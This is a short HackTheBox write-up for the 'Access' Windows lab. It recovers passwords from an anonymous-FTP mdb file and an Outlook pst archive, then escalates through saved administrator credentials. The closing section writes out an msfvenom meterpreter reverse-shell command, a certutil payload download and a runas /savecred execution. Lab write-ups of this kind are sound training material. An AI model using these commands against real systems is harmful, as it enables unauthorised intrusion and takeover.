Access @ HackTheBox

Access @ HackTheBox

In this short writeup I will show how I completed Access on, a quite easy windows box that involves parsing credentials from ms office files, converting mail formats and accessing saved windows credentials.

User Flag

The initial scan shows the following results:

21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
| ftp-syst:
|_  SYST: Windows_NT
23/tcp open  telnet?
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: MegaCorp
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

FTP can be accessed anonymously and allows to download 2 files, Backups\backup.mdb and Engineer\Access The zip file is protected with a password so the first thing I look at is the mdb file. There are some tools like mdb-tools that can parse so mdb format just fine but I decided that a quick string search with strings -n12 might be enough:


This looks like username, password or mail address. Since we just found potential passwords we try them on the archive and access4u@security finally allows to unpack it. From the archive the file Access Control.pst is obtained, which is a file format for mails used by Microsoft. With readpst 'Access Control.pst' && cat 'Access Control.mbox I convert it to the mbox format to make it readable and find another password inside:

The password for the “security” account has been changed to 4Cc3ssC0ntr0ller.

With these credentials it is possible to telnet into the box as user security and read the user flag.

C:\Users\security\Desktop>type user.txt

Root Flag

Doing the usual enumeration I eventually check for stored credentials with cmdkey /list which shows that there are indeed stored ones for the administrator user:

C:\Users\security>cmdkey /list

Currently stored credentials:

    Target: Domain:interactive=ACCESS\Administrator
                                                       Type: Domain Password
    User: ACCESS\Administrator

To get a root shell I generate a simple meterpreter reverse shell with msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=5555 -f exe > xct.exe, download it with certutil certutil.exe -urlcache -split -f xct.exe and execute it with runas runas /user:administrator /savecred "xct.exe", which results in a root shell.

Share this post